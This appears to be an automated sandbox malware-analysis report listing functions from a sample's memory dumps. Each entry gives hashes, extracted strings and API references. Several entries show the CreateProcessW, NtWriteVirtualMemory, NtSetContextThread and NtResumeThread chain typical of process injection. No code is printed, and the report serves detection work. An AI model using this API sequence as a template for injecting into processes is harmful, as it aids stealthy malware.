String ID: i,($qM$G$[v[
API String ID: 0-2528883634
Opcode ID: 3ef1793d4d71e2b5245b204c3eb72ffe824ae4ebc9eb06406bf248d21a7c52b1
Instruction ID: fb998aac318ebe55be9694208b9a5c7f6f6d2a430c99b963d4b99c5316f930ef
Opcode Fuzzy Hash: 3ef1793d4d71e2b5245b204c3eb72ffe824ae4ebc9eb06406bf248d21a7c52b1
Instruction Fuzzy Hash: FBD15870E0520ADFCB84CF99C4909AEFBB2FF88314B15955AC555AB364D334EA42CF98

Function 02DF92E0 Relevance: 4.1, Strings: 3, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

qM$G, xrefs: 02DF9720
i,(, xrefs: 02DF9394
[v[, xrefs: 02DF95DC

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID: i,($qM$G$[v[
API String ID: 0-2528883634
Opcode ID: ddd32b55c7f6f9cff67a1b8ed6920b71241ba318d142e34b14ec8e741dfbace9
Instruction ID: 2f6f5dcc36e3e0847f5f8ea70030b9a78ddc0b066c1c7acfc0c1901313b372e5
Opcode Fuzzy Hash: ddd32b55c7f6f9cff67a1b8ed6920b71241ba318d142e34b14ec8e741dfbace9
Instruction Fuzzy Hash: A7D15771E0520ADFCB84CF9AC4909AEFBB2FF88304B159559C515AB364D734EA42CF98

Function 02DF7053 Relevance: 4.0, Strings: 3, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 02DF7085
Te_q, xrefs: 02DF72B6
Te_q, xrefs: 02DF70F1

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID: Te_q$Te_q$U
API String ID: 0-2293512650
Opcode ID: b718953cfba88cc07f9d46f5f5dd3dd039c501507c223bfc31e33749e96d309a
Instruction ID: 93a38f83d53603847158d53bbdb87f54f0ddeb4d90aad4beb82d1242872f8737
Opcode Fuzzy Hash: b718953cfba88cc07f9d46f5f5dd3dd039c501507c223bfc31e33749e96d309a
Instruction Fuzzy Hash: 00912674E052098FDB48CFA9C9809DEFBB2FF89300F24942AD519AB364D7719946CF54

Function 015245F1 Relevance: 2.9, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i4t:, xrefs: 0152481B
D|zJ, xrefs: 015249E6

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: D|zJ$i4t:
API String ID: 0-2751561044
Opcode ID: 1ffa6b2381ab923db3d550f23db7a52a3693f8680330a7ac06826718bc1e92d6
Instruction ID: 7754f3bf3961a49a7bb34141635132107be927381ef1462ccf796b9398c07e3d
Opcode Fuzzy Hash: 1ffa6b2381ab923db3d550f23db7a52a3693f8680330a7ac06826718bc1e92d6
Instruction Fuzzy Hash: 25F16D75E0521ADFCB04CF95C4808AEFBB2FF8A310B1AC569D416AB655D738A943CF90

Function 0152459F Relevance: 2.9, Strings: 2, Instructions: 375
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

i4t:, xrefs: 0152481B
D|zJ, xrefs: 015249E6

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: D|zJ$i4t:
API String ID: 0-2751561044
Opcode ID: fa6fdd1b99fb0d1b96d00e724575f81911a4c15713b8bc332124a31785eacf04
Instruction ID: 666fbd21278d39d81fb7d5e343b323514b6fcae8d1cbc10d250301e0698994e0
Opcode Fuzzy Hash: fa6fdd1b99fb0d1b96d00e724575f81911a4c15713b8bc332124a31785eacf04
Instruction Fuzzy Hash: 6EF17E75E0521ADFCB04CF95C4808AEFBB2FF8A310B19D569D416AB255D738E942CF90

Function 01522462 Relevance: 2.7, Strings: 2, Instructions: 240
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te_q, xrefs: 015226EF
Te_q, xrefs: 01522541

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: Te_q$Te_q
API String ID: 0-1615656442
Opcode ID: dc3f1a220218f863a7a12f18efff0c2d361af502d0d6005f816a953d277a8b05
Instruction ID: 838f7089854e6c1fdd61f7e4ac01ded2a366c9c040c0ba7ec3802b2f1dd1f87c
Opcode Fuzzy Hash: dc3f1a220218f863a7a12f18efff0c2d361af502d0d6005f816a953d277a8b05
Instruction Fuzzy Hash: F3A11175E042499FCB48CFA9C8809EEFBB2FF8A310F14C26AD419AB255D7359946CF50

Function 02DF7088 Relevance: 2.7, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te_q, xrefs: 02DF72B6
Te_q, xrefs: 02DF70F1

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID: Te_q$Te_q
API String ID: 0-1615656442
Opcode ID: 46e37ceefc414742de9680039119e1a98df7fae96332cc79b0dd11e9ed589411
Instruction ID: 5cb687bd03cadebeaca7a4301d3c911373cc97ed012b294012ebcc6c64024341
Opcode Fuzzy Hash: 46e37ceefc414742de9680039119e1a98df7fae96332cc79b0dd11e9ed589411
Instruction Fuzzy Hash: 4781C374E002099FDB48CFA9C984AEEFBB2FF89300F20942AD519AB358D7759945CF54

Function 015224D8 Relevance: 2.7, Strings: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te_q, xrefs: 015226EF
Te_q, xrefs: 01522541

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: Te_q$Te_q
API String ID: 0-1615656442
Opcode ID: 7bffac627eca025da5a5c208cf8cdfbc609babed18b54139f508ed53203409fa
Instruction ID: 465f6dede657a737d00996086e9e80980082585905dfeaebef720c6142cb27b0
Opcode Fuzzy Hash: 7bffac627eca025da5a5c208cf8cdfbc609babed18b54139f508ed53203409fa
Instruction Fuzzy Hash: ED81C375E002199FDB08CFAAC894AEEFBF2FF89300F24852AD516AB254D7709945CF51

Function 0152B5B8 Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C<7#, xrefs: 0152B69D
C<7#, xrefs: 0152B696

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: C<7#$C<7#
API String ID: 0-2641965759
Opcode ID: c81b983522ec5a51b0f87a69607a39c1c35f5b85c8cb0b9f0e19aabe81bada5d
Instruction ID: 2f0735e322c83aa3e09ef4bf2e2e18b524e1a9c25e43258baac078a4ef91b29d
Opcode Fuzzy Hash: c81b983522ec5a51b0f87a69607a39c1c35f5b85c8cb0b9f0e19aabe81bada5d
Instruction Fuzzy Hash: 3F6146B5D01229CFCF28CFA5C5446AEBBF1FB8A300F18892AD016AB394D7346A41CF50

Function 015208E1 Relevance: 2.6, Strings: 2, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.W_, xrefs: 01520AA8
<, xrefs: 01520A1A

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: <$.W_
API String ID: 0-718456861
Opcode ID: e53cf9caa8edba18b62a1eeba53ab9b5f1185656338dd59c1bb2d6676ae3ad99
Instruction ID: e81ad805cb0df32971c4ec33c8c5371d5f3b46cf64cf8c605cd472c2997f5458
Opcode Fuzzy Hash: e53cf9caa8edba18b62a1eeba53ab9b5f1185656338dd59c1bb2d6676ae3ad99
Instruction Fuzzy Hash: 66617575E01618CFDB58CFAAC9446DDBBF2BF89301F14C1AAD409AB264EB345A85CF50

Function 0AC9CD8E Relevance: 1.9, APIs: 1, Instructions: 405processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0AC9D20F

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d235d2856b7f058ef221499d4cd9d7d4c9ab352526425acb0ba8f7a4d0f231f0
Instruction ID: d5044859f08afb6a07bf1ffe2d18ce9d04191755a0dc3d65c45ae0200a40e0d4
Opcode Fuzzy Hash: d235d2856b7f058ef221499d4cd9d7d4c9ab352526425acb0ba8f7a4d0f231f0
Instruction Fuzzy Hash: C102F0B4E00229CFDF25CFA9C884B9DBBB1BF49304F1581AAE419B7250DB349A85CF55

Function 0AC9CDC0 Relevance: 1.9, APIs: 1, Instructions: 397processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?), ref: 0AC9D20F

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2ab7a572d0b6407fc478003dc3707a48c5e61454c7ac9ba3b1366825008121ec
Instruction ID: 9bc6ee144306d63d6cfcefc312eabd6b86230988848c939eff763e0bbb35fc1f
Opcode Fuzzy Hash: 2ab7a572d0b6407fc478003dc3707a48c5e61454c7ac9ba3b1366825008121ec
Instruction Fuzzy Hash: DE02DFB4E10229CFDF64CFA9C884B9DBBB1BF49304F1181A9E419B7250DB34AA85CF55

Function 0AC9DDC9 Relevance: 1.6, APIs: 1, Instructions: 144nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DEA0

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: edcbe561c73fc5e1a5bcc769e278c411ca56e9d4666e449c8a5494f8e7eb40c0
Instruction ID: ea94cfffb8181c941ee1f3d03029903d615b4383b5a6ef6691fc433924d4c513
Opcode Fuzzy Hash: edcbe561c73fc5e1a5bcc769e278c411ca56e9d4666e449c8a5494f8e7eb40c0
Instruction Fuzzy Hash: 25519BB9D012589FCF10CFA9D984ADEFBB1BB59310F14902AE819B7200D735AA45CF64

Function 0AC9DF21 Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0AC9DFD7

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 89340b9b1d78e4663c6b0f157f708397d9ab91bf80866da1cbd4115fe39e7d6c
Instruction ID: d06332950303e9150b8593567f9550b615c86c7fa070704121cf24a27e0e4eef
Opcode Fuzzy Hash: 89340b9b1d78e4663c6b0f157f708397d9ab91bf80866da1cbd4115fe39e7d6c
Instruction Fuzzy Hash: 8A41ABB5D002589FCB10CFA9D885AEEFBB1BB49310F14842AE419B7240D734AA45CF64

Function 0AC9DDD0 Relevance: 1.6, APIs: 1, Instructions: 115nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DEA0

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 353656bf12e84a289396cb34050a2efec41878a30476a40ef170db5959d08286
Instruction ID: d5ae587f65e5c8a48e64798ef403b3f2435e7124036b92cfe5c517877b69321b
Opcode Fuzzy Hash: 353656bf12e84a289396cb34050a2efec41878a30476a40ef170db5959d08286
Instruction Fuzzy Hash: A241ACB5D012589FCF10CFA9D984AEEFBF1BB59310F14902AE819B7240D735AA45CF54

Function 0AC9D9F0 Relevance: 1.6, APIs: 1, Instructions: 109nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DAAA

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 98b420896cf43468113bff4b016407aa117efca6bff5b292e96e5ad14b96b954
Instruction ID: f101291a291b3883396ba25d6a0b6e33f339be3ce6ecde4ab3926c12eaad2832
Opcode Fuzzy Hash: 98b420896cf43468113bff4b016407aa117efca6bff5b292e96e5ad14b96b954
Instruction Fuzzy Hash: 4241BAB9D042589FCF10CFA9D884AEEFBB5BB59310F14902AE815B7200C739A945DF68

Function 0AC9D9F8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0AC9DAAA

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: ec9974830421e074dc5fdca2f5950a446547cf2b6887621a652f8488400601f4
Instruction ID: c5d74b18c780c4d6703b21608c48b18d5b32627efd11c247a5545640629d2ebd
Opcode Fuzzy Hash: ec9974830421e074dc5fdca2f5950a446547cf2b6887621a652f8488400601f4
Instruction Fuzzy Hash: 1041A9B9D04258DFCF10CFAAD984AEEFBB5BB59310F14942AE815B7200C735A945CF68

Function 0AC9DB59 Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8bf13fa06938585a78741d29b48205ada2e5a4a51302c0dc86e9ace186061b
Instruction ID: 199885c02f94e011ff3ebb04cd98c9dd33d5728119412f167b841289df88a1f9
Opcode Fuzzy Hash: aa8bf13fa06938585a78741d29b48205ada2e5a4a51302c0dc86e9ace186061b
Instruction Fuzzy Hash: ED41CCB9D052089FCB11CFA8D884A9EFFF1AF49314F1580AAE815B7241DB35A946CF54

Function 0AC9DF28 Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL(?,?), ref: 0AC9DFD7

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 3b356057430cba3f84b95e65a13d58baf0fe1c8e853388de1e047332d7ac1ad1
Instruction ID: a47be4eeb63e2c9ecb4cadd000e05a536316d4ab7e11a9d4ad9684a28585e223
Opcode Fuzzy Hash: 3b356057430cba3f84b95e65a13d58baf0fe1c8e853388de1e047332d7ac1ad1
Instruction Fuzzy Hash: 9931A9B5D002589FCB10CFAAD985AEEBBF1BB49310F14842AE419B7240C738A945CF64

Function 0AC9DBA8 Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0AC9DC39

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 546105cb55f96fd6bdc8f115ff03aa0a44f9cb226dc2f7c7c0fc9bff9abf0cf9
Instruction ID: 8cdad62f1d73d0a268304527367eafc2d4e76ea3d27b3625251e3709710b3650
Opcode Fuzzy Hash: 546105cb55f96fd6bdc8f115ff03aa0a44f9cb226dc2f7c7c0fc9bff9abf0cf9
Instruction Fuzzy Hash: A331C8B9D012189FCF10CFA9D984A9EFBF5FB49314F10942AE805B7200C779A946CFA4

Function 0AC9DBB0 Relevance: 1.6, APIs: 1, Instructions: 80nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 0AC9DC39

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a93322e630d72076f4bcdf62e761268e141d0543d18a5b6a50ad2b3f49edfdca
Instruction ID: 7a2d3715ced7869999d59506e9478020cd4f4a46639406a21c75ceeda463b04d
Opcode Fuzzy Hash: a93322e630d72076f4bcdf62e761268e141d0543d18a5b6a50ad2b3f49edfdca
Instruction Fuzzy Hash: CC31B8B9D012189FCF10CFA9D984A9EFBF5FB49310F10942AE815B7200C775A946CFA4

Function 02DF5520 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

<, xrefs: 02DF5655

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID: <
API String ID: 0-4251816714
Opcode ID: a5117db7ee118d9a10855cbf65171bb5827cbf65c50dd15811c7f9d52a9a5dd4
Instruction ID: 3663704547245137a97c113b0eca0740ce037bb0a9ae7d4df6047881b6393824
Opcode Fuzzy Hash: a5117db7ee118d9a10855cbf65171bb5827cbf65c50dd15811c7f9d52a9a5dd4
Instruction Fuzzy Hash: 81918FB5E01658CFDB54CFAAC9806DDBBF2BF89300F1581AAD508AB325D7349A81CF54

Function 0152D038 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

LV=, xrefs: 0152D165

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID: LV=
API String ID: 0-142187384
Opcode ID: 73bc38d0c16fb05278e031d1f25560c6f317bac999ec5c40ddc9bf5ed10319d7
Instruction ID: 88f7bc0690ac78a90fa786db38cab9eaa7463b41135a629d09e901f8afaea9b2
Opcode Fuzzy Hash: 73bc38d0c16fb05278e031d1f25560c6f317bac999ec5c40ddc9bf5ed10319d7
Instruction Fuzzy Hash: 9071C2B5E012198FDB08CFE9D8846AEFBF2FB89301F24852AD919AB358D7345905CB50

Function 02DF7918 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

&[, xrefs: 02DF79E3

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID: &[
API String ID: 0-1761963930
Opcode ID: 538d8114b7ed96839d347f59c2c8a1404a2474aaa14c7decec93c9f1314f3ee5
Instruction ID: 20a971e1aeacbf36dce5af6ee77aa772f120db4aa5a1369ea2ad88a0ef68f5fa
Opcode Fuzzy Hash: 538d8114b7ed96839d347f59c2c8a1404a2474aaa14c7decec93c9f1314f3ee5
Instruction Fuzzy Hash: 36512970E052098FEB48CFAAD9406EEFBF2AF89300F15D52AD555A7364D3349A01CF94

Function 01526F28 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

, xrefs: 01526FAD

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8eaad3a29b228b92317360c7a02332263288be913a827fcc68864f9f034f093c
Instruction ID: 231bb280b97edadd7bbd9724d02ffedd5d322a918b876b5bf7e448b521c4904e
Opcode Fuzzy Hash: 8eaad3a29b228b92317360c7a02332263288be913a827fcc68864f9f034f093c
Instruction Fuzzy Hash: 7521E071E016199BEB58CF6BD844ADEFBF7BFC9200F04C1B6C418AA268DB3409458F11

Function 0152B858 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f442055ee0d3663ea9a2845c10e87ced4efdffe6757a0bc31a7a4a8ebe0ce46c
Instruction ID: 84bd154b4f317df6ab0b3df0905ba46035926495f27fdebce4edba8c79f5193d
Opcode Fuzzy Hash: f442055ee0d3663ea9a2845c10e87ced4efdffe6757a0bc31a7a4a8ebe0ce46c
Instruction Fuzzy Hash: C8A10474E00218DFDB18DFA9D49499EBBF2FF89301F24816AE419AB365DB30A945CF50

Function 0AC9262E Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814468de5c30e72b774b0247d079c90ff368fe18a51aa5c434ccd37d57cd9912
Instruction ID: 69896ae71a49e04731bb31eb24b481cf41f4b9defdf004e3b2a96123b3ed6fa5
Opcode Fuzzy Hash: 814468de5c30e72b774b0247d079c90ff368fe18a51aa5c434ccd37d57cd9912
Instruction Fuzzy Hash: 4591B074E01218DFDB18CFA6D9846DDFBB2FB88310F11952AD809EB264EB3499058F14

Function 01522D20 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e7900f399d9662b983ae51f66af45b4ed094299bdf6649fd921f44874d09715
Instruction ID: 246afc1e957f84f1c772ddfcd946c4cf65e5b93aa7e490ccdabcef5ae719d4e6
Opcode Fuzzy Hash: 7e7900f399d9662b983ae51f66af45b4ed094299bdf6649fd921f44874d09715
Instruction Fuzzy Hash: D1512D75E0521A8FCB48CFAAC4405AEFBF2FF89300F14D46AD415AB2A4D7349A42CF94

Function 0AC90B88 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4924c90654ac3f4fffe573e511bbf325437c1fc2e48a57b9f1ecac13ffb98d74
Instruction ID: df505e2d55a86635adb47dbd75c33a901838c3deaadea928c5a0238a5eb26fa2
Opcode Fuzzy Hash: 4924c90654ac3f4fffe573e511bbf325437c1fc2e48a57b9f1ecac13ffb98d74
Instruction Fuzzy Hash: A66135B0D05209EFCF58CFA6E4486AEBBB1FB89301F119429D41ABB264D7745A41CF51

Function 0AC90B78 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2c06c57c243183f7f1be45d28f1285fa187afdfdf057391e4df3e83a93cb833
Instruction ID: 1a00ccc017fd80aa0a23fc11c7635d6b4df0eff1fd56b913ba7f0d6ad90e2c0e
Opcode Fuzzy Hash: b2c06c57c243183f7f1be45d28f1285fa187afdfdf057391e4df3e83a93cb833
Instruction Fuzzy Hash: CF6137B5D0520AEFCF58CFA6E4486AEBBB1FF89301F11842AD41AA7264D7784A41CF51

Function 0AC9E081 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1503194892.000000000AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac90000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf1b2d8afae930ec92da4a7e056f9794511ec56687bb15435a8efa42f3fe1d8d
Instruction ID: 6ded6738b62b0b753c9598774fb849668c0cb3713be08ee4e5c6192083585b50
Opcode Fuzzy Hash: cf1b2d8afae930ec92da4a7e056f9794511ec56687bb15435a8efa42f3fe1d8d
Instruction Fuzzy Hash: 1951EA75E012289FDB68CF6AC8456D9FBB6EB99310F15C0EAD50DA7314DB309E828F50

Function 02DF8392 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1480916923.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2df0000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e302b222ae88bf371a9fb2caccdeb15d7cbd823fd3e2fd0b754e3e0a5612abd
Instruction ID: 7325a62122a2c2026ea1f2ad8e6931b5dbac5b69f4ca01ed1ab9cb5177a8a441
Opcode Fuzzy Hash: 2e302b222ae88bf371a9fb2caccdeb15d7cbd823fd3e2fd0b754e3e0a5612abd
Instruction Fuzzy Hash: B8313A71E016588FDB58CFAAD8546DEBBF3AFC9300F14C0AAD409AB268DB341A45CF41

Function 01523760 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1480412247.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1520000_mjtjewi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f9f8b3aba97e55f09b4532ee393e86f334df1a6f9695cb92a17e3c99397f8a5
Instruction ID: 4bef30767a158914c26ba09a7b794fa180c1e148e517f7894bb9a3e2a997ad4e
Opcode Fuzzy Hash: 8f9f8b3aba97e55f09b4532ee393e86f334df1a6f9695cb92a17e3c99397f8a5
Instruction Fuzzy Hash: 2431FCB1E016188BDB58CF9AD8447DEBBF3BFC9310F14C16AD409AA268DB740A49CF50

Function 02DF9920 Relevance: 2.6, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yl9], xrefs: 02DF99B0
@Vh:, xrefs: 02DF99CC

Memory Dump Source

